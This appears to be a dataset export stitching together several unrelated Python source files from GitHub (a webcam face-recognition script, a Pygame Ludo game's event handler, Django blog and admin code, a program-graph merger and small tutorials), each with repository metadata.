    img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)  # MTCNN expects RGB input
    detector = MTCNN()
    results = detector.detect_faces(img)
    if len(results) == 0 :
        return
    if results[0]['confidence'] >= 0.5:
        x1, y1, width, height = results[0]['box']
        x1, y1 = abs(x1), abs(y1)  # MTCNN may return slightly negative coordinates
        x2, y2 = x1 + width, y1 + height
        if img is None:  # NOTE(review): img cannot be None at this point - dead guard
            return
        img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)
        img = extract(img,[x1-20,y1-20,x2+20,y2+20])  # pad the face box by 20 px on every side
        return img
    return
def extract(img, coord):
    """Crop *img* to coord = [x1, y1, x2, y2], convert to grayscale, apply
    histogram equalization, save a copy to '1.png' and return the result.

    Returns None when the crop is empty (e.g. the padded face box falls
    outside the frame).
    """
    img = img[coord[1]:coord[3], coord[0]:coord[2]]
    # Bug fix: the original checked `img is None` (impossible for a numpy
    # slice) and printed the leftover debug string "line 26".  An out-of-range
    # crop actually yields an EMPTY array, which would crash cv2.cvtColor.
    if img is None or img.size == 0:
        return
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    img = cv2.equalizeHist(img)  # normalize contrast before recognition
    cv2.imwrite("1.png", img)
    return img
def triplet_loss(y_true,y_pred,alpha = 0.3):
    """FaceNet-style triplet loss.

    y_pred is expected to hold the (anchor, positive, negative) embeddings;
    y_true is unused and exists only to satisfy the Keras loss signature.
    alpha is the margin by which the positive pair must be closer than the
    negative pair.
    """
    anchor = y_pred[0]
    positive = y_pred[1]
    negative = y_pred[2]
    # squared L2 distances anchor<->positive and anchor<->negative
    pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)
    neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)
    # hinge: penalize when pos_dist is not at least alpha smaller than neg_dist
    basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)
    loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0))
    return loss
def vid_capture():
    """Loop over webcam frames, crop the detected face and run it through the
    recognition model via compare_file.compare; runs until the camera closes."""
    model = load_model('models/model.h5', custom_objects={'triplet_loss': triplet_loss})
    cap = cv2.VideoCapture(0)  # default webcam
    K.set_image_data_format('channels_last')
    while cap.isOpened():
        ret,frame = cap.read()
        if ret:
            frame = detect(frame)
            if frame is None:
                continue
            frame = cv2.resize(frame,(100,100))
            if frame is None:  # NOTE(review): cv2.resize never returns None - dead guard
                continue
            cv2.imshow("frame",frame)
            cv2.waitKey(1)
            name = compare_file.compare(model)  # NOTE(review): presumably reads the '1.png' written by extract - confirm
            print(name)
            if name is None or name == " " or name == "unknown":
                print("unknown")
            #return frame
vid_capture() | [
"pritul.dave@gmail.com"
] | pritul.dave@gmail.com |
9a5c036ea6011ce1a883d71cf8ba4d5d725df6fa | 16bb58cd85a0e46b60d43b52bc51149f9fa6e6d4 | /events.py | 1c51f89f12a6571683ecc3c5d15baa162d606d81 | [] | no_license | sunnad99/Fantasy-Ludo-Game | f86e89103b14bf9915de3a0d6d91ff62164484fe | 8b0b29d92a704aca36240011fa3629ca2c5c6e1e | refs/heads/master | 2023-06-15T17:23:22.263237 | 2021-07-08T11:52:17 | 2021-07-08T11:52:17 | 287,137,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,855 | py | import pygame
import time
import sys
class Events:
def __init__(self, game):
self.game = game
self.settings = self.game.settings
def check_mouse_main_menu_event(self, event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_main_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.start_game.collidepoint(self.mouse_pos):
self.game.menu.start_game_color = self.settings.DARK_RED
else:
self.game.menu.start_game_color = self.settings.WHITE
if self.game.menu.exit_game.collidepoint(self.mouse_pos):
self.game.menu.exit_game_color = self.settings.DARK_RED
else:
self.game.menu.exit_game_color = self.settings.WHITE
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_main_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.start_game.collidepoint(self.mouse_pos):
self.game.menu.is_main_menu = False
if state_of_buttons[0] == 1 and self.game.menu.exit_game.collidepoint(self.mouse_pos):
sys.exit()
def check_mouse_second_menu_event(self,event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_2nd_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.player_2.collidepoint(self.mouse_pos):
self.game.menu.two_player_color = self.settings.DARK_RED
else:
self.game.menu.two_player_color = self.settings.BLACK
if self.game.menu.player_3.collidepoint(self.mouse_pos):
self.game.menu.three_player_color = self.settings.DARK_RED
else:
self.game.menu.three_player_color = self.settings.BLACK
if self.game.menu.player_4.collidepoint(self.mouse_pos):
self.game.menu.four_player_color = self.settings.DARK_RED
else:
self.game.menu.four_player_color = self.settings.BLACK
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_2nd_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.player_2.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 2
if state_of_buttons[0] == 1 and self.game.menu.player_3.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 3
if state_of_buttons[0] == 1 and self.game.menu.player_4.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 4
def check_mouse_third_menu_event(self, event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_3rd_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.dwarf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(100)
self.game.menu.player_text = f"Select dwarf for player {self.game.player.current_player}"
elif self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(255)
if self.game.menu.orc_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(100)
self.game.menu.player_text = f"Select orc for player {self.game.player.current_player}"
elif self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(255)
if self.game.menu.lycan_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(100)
self.game.menu.player_text = f"Select lycan for player {self.game.player.current_player}"
elif self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(255)
if self.game.menu.elf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(100)
self.game.menu.player_text = f"Select elf for player {self.game.player.current_player}"
elif self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(255)
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_3rd_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.dwarf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "red"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_red = False
if state_of_buttons[0] == 1 and self.game.menu.orc_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "green"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_green = False
if state_of_buttons[0] == 1 and self.game.menu.lycan_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "blue"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_blue = False
if state_of_buttons[0] == 1 and self.game.menu.elf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "yellow"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_yellow = False
def check_mouse_board_menu_event(self, event_type):
"Uses buttons on the screen to play the game."
if event_type == pygame.MOUSEMOTION and self.game.menu.is_board_menu:
self.mouse_pos = pygame.mouse.get_pos()
if not self.game.menu.is_turn_skip:
if self.game.menu.rtd_button.collidepoint(self.mouse_pos):
self.game.menu.roll_the_dice_button_color = self.settings.DARK_RED
else:
self.game.menu.roll_the_dice_button_color = self.settings.WHITE
else:
if self.game.menu.okay_button.collidepoint(self.mouse_pos):
self.game.menu.okay_button_color = self.settings.DARK_RED
else:
self.game.menu.okay_button_color = self.settings.WHITE
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_board_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.rtd_button.collidepoint(self.mouse_pos) and not self.game.menu.is_turn_skip:
self.game.dice.roll_dice()
self.game.dice.show_dice()
self.game.dice.dice_reset()
elif state_of_buttons[0] == 1 and self.game.menu.okay_button.collidepoint(self.mouse_pos):
self.game.menu.skipped_turn_text = ""
self.game.menu.okay_button_color = self.settings.WHITE
self.game.menu.is_turn_skip = False
    def choose_token_on_board_mouse_event(self):
        """Apply the current dice value to whichever of the current player's
        tokens was clicked: either move a based token onto its starting tile
        (needs a 6) or advance it along the movement/winning path, then end
        the turn."""
        self.mouse_pos = pygame.mouse.get_pos()
        state_of_buttons = pygame.mouse.get_pressed()
        token_checker = 0
        for self.token_selector, self.ludo_token in enumerate(self.game.player.current_player_token_group):
            # This if condition is just to make sure the same dice value doesn't act on multiple tokens on the same spot
            if token_checker == 1:
                break
            # checking to see if token is clicked on (left button held down)
            if self.ludo_token.rect.collidepoint(self.mouse_pos) and state_of_buttons[0] == 1:
                self.placeholder_sprite = self.game.player.current_player_placeholder_group[self.token_selector]
                # This if statement checks if you clicked a token which is placed onto a placeholder (and only puts the token onto a starting tile)
                if self.ludo_token.rect.x == self.placeholder_sprite.rect.x and self.ludo_token.rect.y == self.placeholder_sprite.rect.y:
                    # A token still in its base may only leave on a roll of 6.
                    if self.game.dice.dice_val < 6:
                        self.settings.draw_text("Sorry you cannot choose this token!", self.settings.MAIN_MENU_FONT_PATH, 20, self.settings.BLACK, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
                        self.game.dice.current_turn = False
                    else:
                        self.game.player.current_player_on_start_path()
                        self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.token_selector + 1} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
                # This else statement controls the movement for the tiles on the path (movement and winning tiles)
                else:
                    # Projected position after this roll decides which path the token moves on.
                    self.movement_checker = self.game.dice.dice_val + self.game.player.token_movement_counter[self.game.player.current_player_color][self.token_selector]
                    if self.movement_checker < self.settings.total_movement_steps: # Move on the movement tiles if the winning tiles aren't reached
                        self.game.player.move_on_normal_path()
                        self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.game.player.current_player_color} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
                    else:
                        self.game.player.move_on_winning_path()
                        self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.game.player.current_player_color} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
                token_checker += 1
                self.game.board.draw_on_tiles = False # To ensure the highlighted tiles don't remain highlighted after turn has completed
                self.game.draw_sprites()
                pygame.display.flip()
                time.sleep(1)
                self.game.dice.current_turn = False # To end the turn for the current player
    def highlight_token_on_board_mouse_event(self):
        "This function takes care of all the path highlights based on the token that was hovered over."
        # For the hovered on-board token, compute the list of tiles the current
        # dice value would carry it across (normal path, winning path, or a mix
        # of both) and stash the corresponding sprites on the board for drawing.
        self.mouse_pos = pygame.mouse.get_pos()
        for token_selector, ludo_token in enumerate(self.game.player.current_player_token_group):
            placeholder_sprite = self.game.player.current_player_placeholder_group[token_selector]
            # Tokens still sitting on their base placeholder are skipped entirely.
            if not (ludo_token.rect.x == placeholder_sprite.rect.x and ludo_token.rect.y == placeholder_sprite.rect.y):
                if ludo_token.rect.collidepoint(self.mouse_pos): # the mouse is hovering over the ludo token that is on the board and not in the base
                    current_token_position = self.game.player.token_movement_counter[self.game.player.current_player_color][token_selector] + 1 # we take the current token position and to exclude it, we add 1 to it
                    move_val = current_token_position + self.game.dice.dice_val # determines all the sprites that are to be highlighted
                    # How many of the highlighted tiles fall on the normal movement
                    # path vs. the colour-specific winning path.
                    movement_path_indices = self.settings.total_movement_steps - current_token_position if current_token_position < self.settings.total_movement_steps else 0
                    winning_path_indices = move_val - self.settings.total_movement_steps if move_val > self.settings.total_movement_steps else 0
                    if movement_path_indices != 0 and winning_path_indices !=0: # This situation arises if a dice val arrives such that the tiles to move on include both the movement as well as the winning path tiles
                        movement_path_indices_of_tiles_to_highlight = self.game.player.team_path[self.game.player.current_player_color][current_token_position:current_token_position + movement_path_indices]
                        winning_path_indices_of_tiles_to_highlight = self.game.player.winning_path[self.game.player.current_player_color][:winning_path_indices]
                        self.game.board.path_highlight_sprites = [self.game.board.movement_path_sprites[indice] for indice in movement_path_indices_of_tiles_to_highlight]
                        self.game.board.path_highlight_sprites += [self.game.board.winning_path_dict[self.game.player.current_player_color][indice] for indice in winning_path_indices_of_tiles_to_highlight]
                    elif movement_path_indices != 0: # Highlights only the movement path tiles
                        movement_path_indices_of_tiles_to_highlight = self.game.player.team_path[self.game.player.current_player_color][current_token_position:move_val]
                        self.game.board.path_highlight_sprites = [self.game.board.movement_path_sprites[indice] for indice in movement_path_indices_of_tiles_to_highlight]
                    elif winning_path_indices != 0: # Highlights only the winning path tiles
                        current_winning_path_position = current_token_position - self.settings.total_movement_steps # Current position of token on winning path
                        winning_move_val = (current_token_position + self.game.dice.dice_val) - self.settings.total_movement_steps
                        if not winning_move_val > (self.settings.winning_path_threshold - self.settings.total_movement_steps + 1): # The 1 added to the winning path threshold is just to ensure the last token gets highlighted given the dice value isnt too large
                            winning_path_indices_of_tiles_to_highlight = self.game.player.winning_path[self.game.player.current_player_color][current_winning_path_position:winning_move_val]
                            self.game.board.path_highlight_sprites = [self.game.board.winning_path_dict[self.game.player.current_player_color][indice] for indice in winning_path_indices_of_tiles_to_highlight]
                        else:
                            self.game.board.path_highlight_sprites = [] # This statement is just to ensure the tiles don't highlight on winning path if it goes beyond the winning path tiles
                            self.game.board.draw_on_tiles = False
                    # NOTE(review): returning here leaves draw_on_tiles untouched for
                    # the hovered case; the flag is only forced True when no on-board
                    # token is under the cursor — confirm this is intentional.
                    return
        self.game.board.draw_on_tiles = True
def check_keyboard_final_menu_event(self):
if self.game.menu.is_final_menu:
self.game.menu.is_final_menu = False
| [
"noreply@github.com"
] | noreply@github.com |
24f91adc550d123a98239a57ae27ac6345f382ab | cd44f9f6d97e54886352353da9c45d9e6c291928 | /newspaper/admin.py | d347faa1a852e2b8fbe3b1fd52357e2b88adaebb | [] | no_license | MaksimFelchuck/Felnews | c480f045dc21d6f40e10d233a011fb05522f53f9 | a3411f10230b7cecdac4a49cb7e83c03d1c89444 | refs/heads/master | 2023-02-17T08:13:21.413801 | 2021-01-16T14:55:03 | 2021-01-16T14:55:03 | 330,102,149 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | from django.contrib import admin
from newspaper.models import *
# Register your models here.
@admin.register(News, Image)
class PersonAdmin(admin.ModelAdmin):
    """Registers the News and Image models with default ModelAdmin options.

    NOTE(review): the name "PersonAdmin" does not match the registered
    models; kept as-is since renaming could break importers.
    """
    pass
| [
"felchuck@yandex.ru"
] | felchuck@yandex.ru |
f8e650b4108f33a5a304944caf20ee25f045cba5 | 8747375a4c6442a5bc317baad36ba41f5de4512e | /personal/migrations/0007_auto_20150226_0351.py | ca2beb584b49a1f858048462ec0f5e23cf67c068 | [] | no_license | raultr/perBackend | 40f73199cb722133d79d76b4389d4f613764560b | f22542f79f293de444e29ac7183a0ee9c5b86889 | refs/heads/master | 2022-12-06T10:17:29.400434 | 2017-02-14T03:23:13 | 2017-02-14T03:23:13 | 30,055,264 | 0 | 0 | null | 2022-11-22T00:26:36 | 2015-01-30T03:57:03 | JavaScript | UTF-8 | Python | false | false | 888 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``personal`` app.

    Alters three CharFields on the ``personal`` model (condiciones_alta,
    cuip, id_seguridad_social), all marked ``blank=True``.
    """
    dependencies = [
        ('personal', '0006_personal_imagen'),
    ]
    operations = [
        migrations.AlterField(
            model_name='personal',
            name='condiciones_alta',
            field=models.CharField(default=b'', max_length=150, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='personal',
            name='cuip',
            field=models.CharField(max_length=30, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='personal',
            name='id_seguridad_social',
            field=models.CharField(max_length=20, blank=True),
            preserve_default=True,
        ),
    ]
| [
"raultr@gmail.com"
] | raultr@gmail.com |
0fe9e8dc03af0dfdeae514c6ac4eaa9dce57b024 | c26b3e6df5cbe0f0d40afa675b5e468e939c3672 | /test3.py | 247dd9d5b65c25082aef0ded04a74865a4f651c0 | [] | no_license | TianchiLiu/ModelChecking-1 | 27c78aa1739988f70e3bfb82fc128650e16dddd8 | 38372f6e9f74f30cfe508987706ebf2a5100f4bc | refs/heads/master | 2021-08-09T15:38:16.103196 | 2017-11-12T08:33:05 | 2017-11-12T08:33:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,943 | py | import itertools
import re
# Parse the first program graph (pg1) from its text description.
f=open('/home/kiroscarlet/ModelChecking/pg1.txt','r')# change this to your own folder
Loc1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
# Regex-capture the text between '{' and '}', then split it on commas into a list.
print(Loc1)
Loc01=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Loc01)
Var1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Var1)
var1=Var1[:]
print(var1)
# One domain line per declared variable; the values are parsed into ints.
for i in range(len(var1)):
    var1[i]=re.findall(r"{(.+?)}",f.readline())[0].split(",")
for i in range(len(var1)):
    for j in range(len(var1[i])):
        var1[i][j] = int(var1[i][j])
print(var1)
print(Var1)
Act1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Act1)
g01=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(g01)
t1=[]
# Each entry of t1 is one transition quadruple parsed from a "(...)" line.
f.readline()
while True:
    line=f.readline()
    if re.findall("Effect", line):
        break
    t1.append(re.findall("\((.+?)\)",line)[0].split(","))
def effectRead(f, Effect):
    """Append the remaining lines of *f* to *Effect*, trimming each line's
    last three characters."""
    for raw_line in iter(f.readline, ''):
        Effect.append(raw_line[:-3])
Effect1=[]
effectRead(f,Effect1)
print(Effect1)
f.close()
print(t1)
# Parse the second program graph (pg2) in the same format as pg1.
f=open('/home/kiroscarlet/ModelChecking/pg2.txt','r')# change this to your own folder
Loc2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
# Regex-capture the text between '{' and '}', then split it on commas into a list.
print(Loc2)
Loc02=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Loc02)
Var2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Var2)
var2=Var2[:]
print(var2)
# One domain line per declared variable; the values are parsed into ints.
for i in range(len(var2)):
    var2[i]=re.findall(r"{(.+?)}",f.readline())[0].split(",")
for i in range(len(var2)):
    for j in range(len(var2[i])):
        var2[i][j] = int(var2[i][j])
print(var2)
print(Var2)
Act2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Act2)
g02=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(g02)
t2=[]
# Each entry of t2 is one transition quadruple parsed from a "(...)" line.
f.readline()
while True:
    line=f.readline()
    if re.findall("Effect", line):
        break
    t2.append(re.findall("\((.+?)\)",line)[0].split(","))
Effect2=[]
effectRead(f,Effect2)
print(Effect2)
f.close()
print(t2)
def Cartesian(list1, list2):
    """Return the cross product of two string lists, each pair joined by '_'."""
    return [first + '_' + second for first in list1 for second in list2]
def write_list(list, f):
    """Write the items of *list* to file-like *f* as '{a,b,c}' plus a newline.

    Each item is converted with str(). Fixed: the original indexed
    ``list[-1]`` directly and raised IndexError on an empty list; joining
    handles the empty case by writing '{}'.
    (The parameter name shadows the builtin ``list``; kept for
    backward compatibility with existing callers.)
    """
    f.write('{' + ','.join(str(item) for item in list) + '}\n')
# Combined locations of the product graph, then start writing the output file.
Loc=Cartesian(Loc1,Loc2)
print(Loc)
Loc0=Cartesian(Loc01,Loc02)
print(Loc0)
f=open('/home/kiroscarlet/ModelChecking/pg1andpg2.txt','w')
f.write('Loc=')
write_list(Loc,f)
f.write('Loc0=')
write_list(Loc0,f)
def varMerge(Var, Var1, Var2, var, var1, var2):
    """Merge two parallel (name, domain) lists into Var/var.

    Walks both name lists pairwise; each step keeps the first graph's
    entry and, when the names differ at that position, also keeps the
    second graph's entry. Entries beyond the shorter name list are
    dropped.
    """
    pair_count = min(len(Var1), len(Var2))
    for idx in range(pair_count):
        Var.append(Var1[idx])
        var.append(var1[idx])
        if Var1[idx] != Var2[idx]:
            Var.append(Var2[idx])
            var.append(var2[idx])
# Merge the variable declarations (shared variables appear once) and write them.
Var=[]
var=[]
varMerge(Var,Var1,Var2,var,var1,var2)
print(var)
f.write('Var=')
write_list(Var,f)
for i in range(len(Var)):
    f.write(Var[i]+'=')
    write_list(var[i],f)
print(var)
Act=Act1+Act2
print(Act)
f.write('Act=')
write_list(Act,f)
# The combined initial guard is the conjunction of the two initial guards.
g0=[]
g0.append('('+g01[0]+')'+' and '+'('+g02[0]+')')
f.write('g0=')
write_list(g0,f)
f.write('Translation\n')
t=[]
def transtationMerge(t, t1, t2):
    """Append the interleaved product transitions of two program graphs to *t*.

    A transition is a 4-item list [source, guard, action, target]; in the
    product, whichever graph does not move contributes only its source
    location to the combined 'source_target' names.
    """
    def first_moves(own, other):
        # Graph 1 fires *own* while graph 2 idles in other[0].
        merged = own[:]
        merged[0] = own[0] + '_' + other[0]
        merged[3] = own[3] + '_' + other[0]
        return merged

    def second_moves(other, own):
        # Graph 2 fires *own* while graph 1 idles in other[0].
        merged = own[:]
        merged[0] = other[0] + '_' + own[0]
        merged[3] = other[0] + '_' + own[3]
        return merged

    t.extend(first_moves(a, b) for a in t1 for b in t2)
    t.extend(second_moves(a, b) for b in t2 for a in t1)
t=[]
transtationMerge(t,t1,t2)
print(t)
# Write each combined transition back out in " (a,b,c,d)" form.
for i in t:
    f.write(r' (')
    for j in i[0:-1]:
        f.write(str(j)+',')
    f.write(str(i[-1])+')\n')
f.write('Effect\n')
# Effects from both graphs are concatenated verbatim.
Effect=Effect1+Effect2
print(Effect)
for i in Effect:
    f.write(i)
| [
"1277836029@qq.com"
] | 1277836029@qq.com |
9d11cd4b5864d8bfb62d272e97077989d61f7c84 | 6f73053e9c5a8bb40f34dd12a9a000ad3ca84f1f | /exchange/core/entities/__init__.py | ea1a17b054ed4a7f887d52c46eed80386fa3aeab | [] | no_license | Bizilizi/python-crypto-exchange | 9610857580b5c0239a9cbd778246c65e693a8d31 | 9eef1641e8cc04a7b3922447b05c04e37268187b | refs/heads/master | 2022-12-01T14:28:28.819215 | 2020-08-14T06:26:37 | 2020-08-14T06:26:37 | 287,306,992 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from .account import Account
from .balance import (
BalanceRecord,
PairBalance,
)
from .fee import Fee
from .order_book import Order, OrderBook
from .symbol_pair import SymbolPair
__all__ = [
"Account",
"BalanceRecord",
"PairBalance",
"Fee",
"Order",
"OrderBook",
"SymbolPair",
]
| [
"ewriji@airlab.team"
] | ewriji@airlab.team |
257a852010c6ac198207acb56d1e5dcc5f9a136c | ba31ca99cd83d263952a3ab949cec21bec9831dd | /CollectionsOverview/tuple&namedtuple/tuple&namedtuple.py | 22667d869d07c6380683598637a5d390a90043f2 | [] | no_license | YizhuZhan/python-study | dd4f492c4a5b2b1bebcbd463380c57c1f6594a69 | 49bed4935e6d4bd1bdfd5f7159cc0e1c783e5764 | refs/heads/master | 2020-03-29T04:54:32.850829 | 2018-10-23T03:39:33 | 2018-10-23T03:39:33 | 149,554,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,972 | py | # -*-coding=utf-8 -*-
__author__ = 'Ivana'
from collections import namedtuple
# Abstract base classes (interfaces) would come from collections.abc:
# from collections.abc import *
from collections import namedtuple
user_tuple = ('Ivana', 27, 167)
name, age, height = user_tuple
print(name, age, height)
name, *others = user_tuple
print(name, others)
user_info_dict = {}
user_info_dict[user_tuple] = 'programmer'
print(user_info_dict)
# namedtuple can be used directly for rows read from a database.
User = namedtuple("User", ["name", "age", "height"])
user1 = User("Ivana", 27, 167)
print(user1.name, user1.age, user1.height)
# namedtuple fields are accessible both by field name and by position (from 0).
print(user1[0], user1[1], user1[2])
# The whole tuple can also be printed directly.
print(user1)
# Take all rows from a 'user' table and add an "edu" column; a namedtuple
# extended with "edu" can be written straight back to the database.
# Single-star (iterable) unpacking into the constructor:
User = namedtuple("User", ["name", "age", "height", "edu"])
user_tuple = ("Ivana", 27, 167)
user2 = User(*user_tuple, "master")
print(user2.name, user2.age, user2.height, user2.edu)
# Double-star (mapping) unpacking into the constructor:
User = namedtuple("User", ["name", "age", "height", "edu"])
user_dict = {"name": "sql", "age": 27, "height": 178}
user3 = User(**user_dict, edu="master")
print(user3.name, user3.age, user3.height, user3.edu)
# Instances of namedtuple-generated classes support tuple unpacking;
# instances of ordinary classes do not.
name, age, *others = user3
print(name, age, others)
# _asdict() converts the tuple to a dict and returns an OrderedDict-like object.
d2 = user2._asdict()
print(d2)
userd2 = User(**d2)
print(userd2.name, userd2.age, userd2.height, userd2.edu)
# _make() takes an iterable argument, but is less flexible: it needs
# exactly one value per field.
try:
    user4 = User._make(['zyz', 18, 165])
except Exception as e:
    print(e.args) # Expected 4 arguments, got 3
    user4 = User._make(['zyz', 18, 165, "master"])
finally:
print(user4) # User(name='zyz', age=18, height=165, edu='master') | [
"zhyzh910914@126.com"
] | zhyzh910914@126.com |
058eed73a68232a87c8199303860ed5deb0c7b42 | 08093753140a6a32e37799e45021fe7905f72b2a | /ib-all-factors.py | 39e9274a22e341856b6dc0dc0c4141f44d9853aa | [] | no_license | ShivendraAgrawal/coding_2016 | 6aa503b4b3ffbe14aca086e64661f608b136832f | 2a973860acfdbcec55dd180aa4a08384d97a78d7 | refs/heads/master | 2020-05-22T09:17:42.641422 | 2016-08-01T10:56:08 | 2016-08-01T10:56:08 | 49,042,801 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | class Solution:
# @param A : integer
# @return a list of integers
def allFactors(self, A):
result = []
stop = int((A**(0.5)) // 1) + 1
print(stop)
for i in range(1,stop):
if A%i == 0:
result.append(i)
result.append(A//i)
result = list(set(result))
return sorted(result)
def isPrime(self, A):
if A == 1:
return 0
stop = int((A**(0.5)) // 1) + 1
for i in range(2,stop):
if A%i == 0:
return 0
return 1
# Smoke test: 18 = 2 * 3^2 is composite, so this prints 0.
A = 18
s = Solution()
print(s.isPrime(A))
"shivendra.agrawal@gmail.com"
] | shivendra.agrawal@gmail.com |
3f1d716a0e6f5b1bb216b80ae844859e1cb0e536 | 31072bce3e3279f831dea880873adce58c84fdc4 | /blog/urls.py | c678fd4a28abd9883ddbbc078f6f8dd0ffa91bca | [] | no_license | 100sarthak100/Python_Django_Blog | 00eeb475602d8beee79b9b7fc70a8b42e39becfb | 842a0b5b91200c61119f3ee16ced3bd61cf1b66b | refs/heads/master | 2022-12-05T04:38:41.300348 | 2019-12-24T04:01:44 | 2019-12-24T04:01:44 | 228,986,653 | 1 | 0 | null | 2022-11-22T04:55:08 | 2019-12-19T06:06:25 | JavaScript | UTF-8 | Python | false | false | 1,085 | py | from django.urls import path,include
from .views import (
PostListView,
PostDetailView,
PostCreateView,
PostUpdateView,
PostDeleteView,
UserPostListView,
)
from . import views
# URL routes for the blog app: comment moderation, TinyMCE editor endpoints,
# post CRUD via class-based views, per-user post lists, and the about page.
urlpatterns = [
    #path('api/blog/', include('blog.api.urls'), name='blog-api'),
    path('comment/<int:pk>/approve/', views.comment_approve, name='comment_approve'),
    path('comment/<int:pk>/remove/', views.comment_remove, name='comment_remove'),
    path('post/<int:pk>/comment/', views.add_comment_to_post, name='add_comment_to_post'),
    path('tinymce/', include('tinymce.urls')),
    path('', PostListView.as_view(), name='blog-home'),
    path('user/<str:username>', UserPostListView.as_view(), name='user-posts'),
    path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
    path('post/new/', PostCreateView.as_view(), name='post-create'),
    path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
    path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
    path('about/', views.about, name='blog-about'),
]
"sarthaknaithani127@gmail.com"
] | sarthaknaithani127@gmail.com |
f7a595ddeaf0589237edbce2280478c40f9f06a1 | 475a4cfa6cf4d4e6d05a6497a4012ae98e171bb9 | /organization/utils.py | 647b0150c76f692479decd36a4ca5f17fdf05ea3 | [
"BSD-3-Clause"
